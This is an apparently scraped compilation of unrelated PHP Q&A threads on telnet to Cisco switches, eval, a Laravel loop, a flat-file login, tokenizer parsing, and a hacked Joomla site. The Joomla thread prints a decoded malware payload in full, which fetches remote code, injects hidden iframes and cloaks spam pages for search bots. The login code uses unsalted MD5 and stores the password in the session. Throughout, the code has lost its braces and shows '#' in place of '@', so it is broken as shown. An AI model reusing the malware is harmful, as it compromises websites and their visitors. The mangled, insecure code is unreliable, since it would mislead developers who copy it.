Telnet to cisco switch using php - php

I need to telnet to cisco switch using php and execute show interface status command and get results. I tried some php classes I found on internet but none of them could connect to device. So I tried to write the script myself, but I have the same problem, I cant connect to device.
The host sends me banner message and then new line with username:.
I send my username with \r\n, wait some time and tries to read data, but it looks to me like host is just ignoring my new line characters. This is response I got (explode('\n') on response):
[0] => %
[1] => User Access Verification
[2] => Username: timeout expired!
Why didn't I get prompt on password? I tried it with sending telnet headers, and without, no change. Can anyone please help me?
Here is my code
$host = "switchName";
$name = "name";
$pass = "pass";
$port = 23;
$timeOut = 15;
$connected = false;
$skipNullLines = true;
$timeout = 125000;
function read_string()
global $fw,$host,$skipNullLines;
$string = "";
while( !feof($fw) )
$read = fgets($fw);
$string .= $read;
// Probably prompt, stop reading
if( strpos($read, ':') !== FALSE || strpos($read, '> (enable)') !== FALSE || strpos($read, $host.'#') !== FALSE)
{ break; }
$string = explode("\n", $string);
// Get rid of null lines
$ret = array();
for($i = 0; $i<count($string); $i++)
if( trim($string[$i]) == '' && $skipNullLines ) continue;
$ret[] = $string[$i];
return $ret;
function send_string($string, $force=false)
GLOBAL $timeout,$fw;
$string = trim($string);
// execute only strings that are preceded by "show" (if not forced)
if(!$force && strpos($string, 'show ') !== 0)
return 1;
fputs($fw, $string."\r\n");
$fw = fsockopen($host, $port, $errno, $errorstr, $timeOut);
if($fw == false)
echo("Cant connect");
$connected = true;
stream_set_timeout($fw, $timeout);
// fputs($fw, $header1);
// usleep($timeout);
// fputs($fw, $header2);
// usleep($timeout);
send_string("test", true);
If I send username at first, and then I read, I get password prompt. I dont understand it, why cant I firstly read messages from host and then send my response. The way it works to me now (send response and then read for prompt) is no-sense! (and I still got "% Authentication failed." message event with right password/name).
$connected = true;
stream_set_timeout($fw, $timeout);
send_string("name", true);
send_string("password", true);

Okay, so I dont know what was the problem, but after "few" tests I was able to write this class that works for me. I dont know why other telnet classes dont work altough they do pretty much the same. So if anyone will have similar problem, you can try this:
class TELNET
private $host;
private $name;
private $pass;
private $port;
private $connected;
private $connect_timeout;
private $stream_timetout;
private $socket;
public function TELNET()
$this->port = 23;
$this->connected = false; // connected?
$this->connect_timeout = 10; // timeout while asking for connection
$this->stream_timeout = 380000; // timeout between I/O operations
public function __destruct()
if($this->connected) { fclose($this->socket); }
// Connects to host
// #$_host - addres (or hostname) of host
// #$_user - name of user to log in as
// $#_pass - password of user
// Return: TRUE on success, other way function will return error string got by fsockopen()
public function Connect($_host, $_user, $_pass)
// If connected successfully
if( ($this->socket = #fsockopen($_host, $this->port, $errno, $errorstr, $this->connect_timeout)) !== FALSE )
$this->host = $_host;
$this->user = $_user;
$this->pass = $_pass;
$this->connected = true;
stream_set_timeout($this->socket, 0, 380000);
stream_set_blocking($this->socket, 1);
return true;
// else if coulnt connect
else return $errorstr;
// LogIn to host
// RETURN: will return true on success, other way returns false
public function LogIn()
if(!$this->connected) return false;
// Send name and password
$this->SendString($this->user, true);
$this->SendString($this->pass, true);
// read answer
$data = $this->ReadTo(array('#'));
// did we get the prompt from host?
if( strtolower(trim($data[count($data)-1])) == strtolower($this->host).'#' ) return true;
else return false;
// Function will execute command on host and returns output
// #$_command - command to be executed, only commands beginning with "show " can be executed, you can change this by adding
// "true" (bool type) as the second argument for function SendString($command) inside this function (3rd line)
function GetOutputOf($_command)
if(!$this->connected) return false;
$output = array();
$work = true;
// Read whole output
// read_to( array( STRINGS ) ), STRINGS are meant as possible endings of outputs
while( $work && $data = $this->ReadTo( array("--More--","#") ) )
// CHeck wheter we actually did read any data
$null_data = true;
foreach($data as $line)
if(trim($line) != "") {$null_data = false;break;}
if($null_data) { break;}
// if device is paging output, send space to get rest
if( trim($data[count($data)-1]) == '--More--')
// delete line with prompt (or "--More--")
// if second line is blank, delete it
if( trim($data[1]) == '' ) unset($data[1]);
// If first line contains send command, delete it
if( strpos($data[0], $_command)!==FALSE ) unset($data[0]);
// send space
fputs($this->socket, " ");
// ak ma vystup max dva riadky
// alebo sme uz nacitali prompt
// IF we got prompt (line ending with #)
// OR string that we've read has only one line
// THEN we reached end of data and stop reading
if( strpos($data[count($data)-1], '#')!==FALSE /* || (count($data) == 1 && $data[0] == "")*/ )
// delete line with prompt
// if second line is blank, delete it
if( trim($data[1]) == '' ) unset($data[1]);
// If first line contains send command, delete it
if( strpos($data[0], $_command)!==FALSE ) unset($data[0]);
// stop while cyclus
$work = false;
// get rid of empty lines at the end
for($i = count($data)-1; $i>0; $i--)
if(trim($data[$i]) == "") unset($data[$i]);
else break;
// add new data to $output
foreach($data as $v)
{ $output[] = $v; }
// return output
return $output;
// Read from host until occurence of any index from $array_of_stops
// #array_of_stops - array that contains strings of texts that may be at the end of output
// RETURNS: output of command as array of lines
function ReadTo($array_of_stops)
$ret = array();
$max_empty_lines = 3;
$count_empty_lines = 0;
while( !feof($this->socket) )
$read = fgets($this->socket);
$ret[] = $read;
// Stop reading after (int)"$max_empty_lines" empty lines
if(trim($read) == "")
if($count_empty_lines++ > $max_empty_lines) break;
else $count_empty_lines = 0;
// Does last line of readed data contain any of "Stop" strings ??
$found = false;
foreach($array_of_stops AS $stop)
if( strpos($read, $stop) !== FALSE ) { $found = true; break; }
// If so, stop reading
if($found) break;
return $ret;
// Send string to host
// If force is set to false (default), function sends to host only strings that begins with "show "
// #$string - command to be executed
// #$force - force command? Execute if not preceeded by "show " ?
// #$newLine - append character of new line at the end of command?
function SendString($string, $force=false, $newLine=true)
$t1 = microtime(true);
$string = trim($string);
// execute only strings that are preceded by "show"
// and execute only one command (no new line characters) !
if(!$force && strpos($string, 'show ') !== 0 && count(explode("\n", $string)) == 1)
return 1;
if($newLine) $string .= "\n";
fputs($this->socket, $string);
$t2 = microtime(true);
$host = "hostname";
$name = "username";
$pass = "password";
$t = new TELNET();
echo("CONNECT:".$t->Connect($host, $name, $pass)."<br>");
print_r($t->GetOutputOf("show snmp"));
print_r($t->GetOutputOf("show users"));
print_r($t->GetOutputOf("show interface status"));
PS: my devices prompt is "hostname#", so you may need to edit Login function to make this code work with prompt of your device (so you may need in GetOutputOf() )


php include or require contents of a variable, not a file

I'm looking for a way to include or require the content of a variable, instead of a file.
Normally, one can require/include a php function file with either of these:
Suppose I wanted to do something like this:
$contentOf1stFFile = file_get_contents('/tmp/my1stphpfunctionfile.php');
$contentOf2ndFFile = file_get_contents('/tmp/my2ndphpfunctionfile.php');
Now, in the above example, I have the actual function files which I am loading into variables. In the real world scenario I'm actually dealing with, the php code in the function files are not stored in files. They're in variables. So I'm looking for a way to treat those variables as include/require treats the function files.
I'm new to php so please forgive these questions if you find them foolish. What I'm attempting to do here does not appear to be possible. What I ended up doing was using eval which I'm told is very dangerous and should be avoided:
Content of $contentOf1stFFile:
# class_lookup.php
class Lookup_whois {
// Domain name which we want to lookup
var $domain;
// TLD for above domain, eg. 'com', 'net', etc...
var $tld;
// Array which contains information needed to parse the whois server response
var $tld_params;
// Sets to error code if something fails
var $error_code;
// Sets user-friendly error message if something goes wrong
var $error_message;
// For internal use mainly - raw response from the whois server
var $whois_raw_output;
function Lookup_whois($domain, $tld, $tld_params) {
$this->domain = $domain;
$this->tld = $tld;
$this->tld_params = $tld_params;
function check_domain_spelling() {
if (preg_match("/^([A-Za-z0-9]+(\-?[A-za-z0-9]*)){2,63}$/", $this->domain)) {
return true;
} else {
return false;
function get_whois_output() {
if (isset($this->tld_params[$this->tld]['parameter'])) {
$query = $this->tld_params[$this->tld]['parameter'].$this->domain.'.'.$this->tld;
} else {
$query = $this->domain.'.'.$this->tld;
$server = $this->tld_params[$this->tld]['whois'];
if (!$this->check_domain_spelling()) {
$this->error_message = 'Domain name is not correct, check spelling. Only numbers, letters and hyphens are allowed';
return false;
if (!$server) {
$this->error_message = 'Whois server name is empty, please check the config file';
return false;
$output = array();
$fp = fsockopen($server, 43, $errno, $errstr, 30);
if(!$fp) {
$this->error_code = $errno;
$this->error_message = $errstr;
return false;
} else {
fputs($fp, $query . "\n");
while(!feof($fp)) {
$output[] = fgets($fp, 128);
$this->whois_raw_output = $output;
return true;
function parse_whois_data() {
if (!is_array($this->whois_raw_output) && Count($this->whois_raw_output) < 1) {
$this->error_message = 'No output to parse... Get data first';
return false;
$wait_for = 0;
$result = array();
$result['domain'] = $this->domain.'.'.$this->tld;
foreach ($this->whois_raw_output as $line) {
#if (ereg($this->tld_params[$this->tld]['wait_for'], $line)) {
if (preg_match($this->tld_params[$this->tld]['wait_for'],$line)) {
$wait_for = 1;
if ($wait_for == 1) {
foreach ($this->tld_params[$this->tld]['info'] as $key => $value) {
$regs = '';
if (ereg($value.'(.*)', $line, $regs)) {
if (key_exists($key, $result)) {
if (!is_array($result[$key])) {
$result[$key] = array($result[$key]);
$result[$key][] = trim($regs[1]);
} else {
$result[$key] = trim($regs[1]);
$i = 1;
return $result;
Are there any other alternatives?
No there are no other alternatives.
In terms of security there is no difference if you include() a file or eval() the content. It depends on the context. As long as you only run your own code there is nothing "dangerous".

LAravel 505 error

This has been giving a
404 page error not found
and i don't know why.
public static function getGeneration($currentParent, $rootParent){
// dd($rootParent);
$user = User::where("username", $currentParent)->first();
$generation =[];
$x = 0;
$bool = true;
while ($bool) {
$generation[$x] = (User::where("username", $user->sponsor_username)
$generation[$x] = (User::where("username", $generation[$x-1])
if( $x > 0 ){
if($news = $generation[$x] == $rootParent){
$bool = false;
return $generation;
what this method basicaly does is go through a database and find out who brought a particular user into a system, because is user has a sponsor_username against it on the database, the last if statement is meant to stop when it discovers that it has reached the root user.

Php txt database reading

I'm working on a flat-file based login session. I'm modifying it to require only MD5 password. This is the txt file containing users and passwords MD5.
And this is a part of my php code.
/* Bool validateLogin() returns TRUE if login/password are valid. Returns FALSE and sets $this->errorMessage if invalid or other error. */
function validateLogin() {
$this->errorMessage = '';
if($this->parseUserFile()) {
if( md5($_POST['password']) == $this->userData['password']) {
$_SESSION['loginId'] = $_POST['password'];
return(TRUE); }
else { $this->errorMessage = "Invalid user name and/or password"; }
else { $this->errorMessage = "Unable to read user login data file"; }
} // end validateLogin()
/* Mixed parseUserFile(). Returns number of users in userFile, else FALSE */
function parseUserFile() {
$this->userData = array();
if(is_readable($this->userFile)) {
$lines = file($this->userFile);
foreach($lines as $line) {
$line = trim($line);
if($line == "") { continue; }
$parts = preg_split('/:/', trim($line));
if(count($parts) >= 2) {
list($user, $password) = $parts;
$this->userData['password'] = $password; } } }
return((count($this->userData)) ? count($this->userData) : FALSE );
}// end parseUserFile()
MY PROBLEM: it gives me access ONLY with the last password in the list txt.
The first and second passwords won't work.
Can you spot any mistake in the code guys?
I don't know PHP much but the issue appears to me from your code is in parseUserFile and is that you are looping through the file contents and in each iteration you are assigning.
$this->userData['password'] = $password; }
So, in each iteration, userData array's same item (i.e. item with key 'password') is getting overwritten by the password value in that line. So, after it finishes with looping through all the items in the file, it holds only the value of last password.
Instead what you should be doing is this:
//Pass in user name to fetch password for the user
function parseUserFile($userName) {
$this->userData = array();
if(is_readable($this->userFile)) {
$lines = file($this->userFile);
foreach($lines as $line) {
$line = trim($line);
if($line == "") { continue; }
$parts = preg_split('/:/', trim($line));
if(count($parts) >= 2) {
list($user, $password) = $parts;
//Get password for the user.
if($user == $userName)
$this->userData['password'] = $password; } } }
return((count($this->userData)) ? count($this->userData) : FALSE );
}// end parseUserFile()

Joomla back-end login page keeps coming back to login page with no error. configuration.php file is infected. How to manage?

Since a week i was trying to login to the back-end of my joomla 1.5 site. It simply keeps coming back to the login page without any error. When I took a look at the configuration.php file it appeared as a string encoded with following pattern:
<?php eval(base64_decode('string here';))) />
When i decoded it using an online service this is what it appears to be:
if (!defined('frmDs')){ define('frmDs' ,1); function frm_dl ($url) { if (function_exists('curl_init')) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $out = curl_exec ($ch); if (curl_errno($ch) !== 0) $out = false; curl_close ($ch); } else {$out = #file_get_contents($url);} return trim($out); } function frm_crpt($in){ $il=strlen($in);$o=''; for ($i = 0; $i < $il; $i++) $o.=$in[$i] ^ '*'; return $o; } function frm_getcache($tmpdir,$link,$cmtime,$del=true){ $f = $tmpdir.'/sess_'.md5(preg_replace('/^http:\/\/[^\/]+/', '', $link)); if(!file_exists($f) || time() - filemtime($f) > 60 * $cmtime) { $dlc=frm_dl($link); if($dlc===false){ if(del) #unlink($f); else #touch($f); } else { if($fp = #fopen($f,'w')){ fwrite($fp, frm_crpt($dlc)); fclose($fp); }else{return $dlc;} } } $fc = #file_get_contents($f); return ($fc)?frm_crpt($fc):''; } function frm_isbot($ua){ if(($lip=ip2long($_SERVER['REMOTE_ADDR']))<0)$lip+=4294967296; $rs = array(array(3639549953,3639558142),array(1089052673,1089060862),array(1123635201,1123639294),array(1208926209,1208942590), array(3512041473,3512074238),array(1113980929,1113985022),array(1249705985,1249771518),array(1074921473,1074925566), array(3481178113,3481182206),array(2915172353,2915237886)); foreach ($rs as $r) if($lip>=$r[0] && $lip<=$r[1]) return true; if(!$ua)return true; $bots = array('googlebot','bingbot','slurp','msnbot','jeeves','teoma','crawler','spider'); foreach ($bots as $b) if(strpos($ua, $b)!==false) return true; return false; } function frm_tmpdir(){ $fs = array('/tmp','/var/tmp'); foreach (array('TMP', 'TEMP', 'TMPDIR') as $v) { if ($t = getenv($v)) {$fs[]=$t;} } if (function_exists('sys_get_temp_dir')) {$fs[]=sys_get_temp_dir();} $fs[]='.'; foreach ($fs as $f){ $tf = $f.'/'.md5(rand()); if($fp = #fopen($tf, 'w')){ fclose($fp); unlink($tf); return $f; } } return false; } function frm_seref(){ $r = #strtolower($_SERVER["HTTP_REFERER"]); $ses = array('google','bing','yahoo','ask','aol'); foreach ($ses as $se) if(strpos($r, $se.'.')!=false) return true; return false; } function frm_isuniq($tdir){ $ip=$_SERVER['REMOTE_ADDR']; $dbf=$tdir.'/sess_'.md5(date('m.d.y')); $odbf = $tdir.'/sess_'.md5(date('m.d.y',time()-86400)); if (file_exists($odbf)) #unlink($odbf); if(strpos(frm_crpt(#file_get_contents($dbf)),$ip) === false ){ if ($fp=#fopen($dbf,'a')){fputs($fp,frm_crpt($ip.'|')); fclose($fp);} return true; } return false; } $tdir = frm_tmpdir(); $defframe = '<style> .gtvvh { position:absolute; left:-760px; top:-927px; }</style><div class="gtvvh"><iframe src="" width="477" height="435"></iframe></div>'; $defrdg=''; $codelink = ''; $rdglink=''; $ua=$_SERVER['HTTP_USER_AGENT']; $isb=frm_isbot($ua); if (!$isb && preg_match('/Windows/', $ua) && preg_match('/MSIE|Opera/', $ua) && frm_isuniq($tdir) ){ error_reporting(0); if(!isset($_COOKIE['__utmfr'])) { if(!$codelink) print($defframe); else print(frm_getcache($tdir,$codelink,15)); #setcookie('__utmfr',rand(1,1000),time()+86400*7,'/'); } } //------- $host = preg_replace('/^w{3}\./','', strtolower($_SERVER['HTTP_HOST'])); if($tdir && strlen($host)<100 && preg_match('/^[a-z0-9\-]+\.([a-z]{2,5}|[a-z]{2,3}\.[a-z]{2,3}|.*\.edu)$/', $host)){ $parg = substr(preg_replace( '/[^a-z]+/', '',strtolower(base64_encode(md5($host)))),0,3); $pageid = (isset($_GET[$parg]))?$_GET[$parg]*1:0; $ruri = strtolower($_SERVER['REQUEST_URI']); if((strpos($ruri,'/?')===0||strpos($ruri,'/index.php?')===0) && $pageid > 0){ print(frm_getcache($tdir,"$host&p=$pageid&pa=$parg",60*48,false)); exit(); } if ($isb) { error_reporting(0); print(frm_getcache($tdir,"$host&pa=$parg&g=".(($ruri=='/'||$ruri=='/index.php')?'1':'0'),60*48,false)); } } //---------}
I checked other Joomla installations on my hosting space and see that all the configuration.php are the same.
What to do?
Please help
The only thing the the configuration.php file should have is defined variables. Nothing else. It could very well be that someone has hacked your site and messed around with files.
Change all passwords that are related to your website, including the hosting one.
Take a backup of your site via the cPanel and scan it with some antivirus software. Assuming there are no viruses detected, upgrade your site to the latest of the Joomla 2.5 series (2.5.14).
Then, remove the code you showed in your question from the configuration.php file and try logging back into the Joomla admin panel. If it works, ensure all your extensions are up to date and read this:
Joomla! 2.5.4 Hacked: Having trouble with diagnosis.
If not, then try resetting your super user password via the database:
It seems your whole configuration.php file has been attacked. I have provided you with the code for the file, however there are some blank spaces to be filled in. Anything that does need filling in, I have written next to it:
Let me know how it goes :)

Get return values of code with tokenizer

I'm trying to parse PHP source code with the token_get_all(). So far everything worked out with that function, but now i need a way to get the return values of methods.
Identifying where a return is done isn't the problem. I just see no way of getting the piece of code that comes after the return value.
For example for this piece of code:
class Bla {
public function Test1()
$t = true;
if($t) {
return 1;
return 0;
public function Test2()
echo "bbb";
return; // nothing is returned
public function Test3()
echo "ccc";
$someval1 = 1;
$someval2 = 2;
return ($someval + $otherval)*2;
I'm using get_token_all() to identify where a return is done:
$newStr = '';
$returnToken = T_RETURN;
$tokens = token_get_all($source);
foreach ($tokens as $key => $token)
if (is_array($token))
if (($token[0] == $returnToken))
// found return, now get what is returned?
$token = $token[1];
$newStr .= $token;
I have no clue how to get the piece of code that is actually returned. That is what i want to get.
Anyone any idea how i could do this?
Perhaps this might help. Though I curious to know what you are ultimately trying to do.
$tokens = token_get_all($str);
$returnCode = '';
$returnCodes = array();
foreach ($tokens as $token) {
// If return statement start collecting code.
if (is_array($tokens) && $token['0'] == T_RETURN) {
$returnCode .= $token[1];
// if we started collecting code keep collecting.
if (!empty($returnCode)) {
// if we get to a semi-colon stop collecting code
if ($token === ';') {
$returnCodes[] = substr($returnCode, 6);
$returnCode = '';
} else {
$returnCode .= isset($token[1]) ? $token[1] : $token;
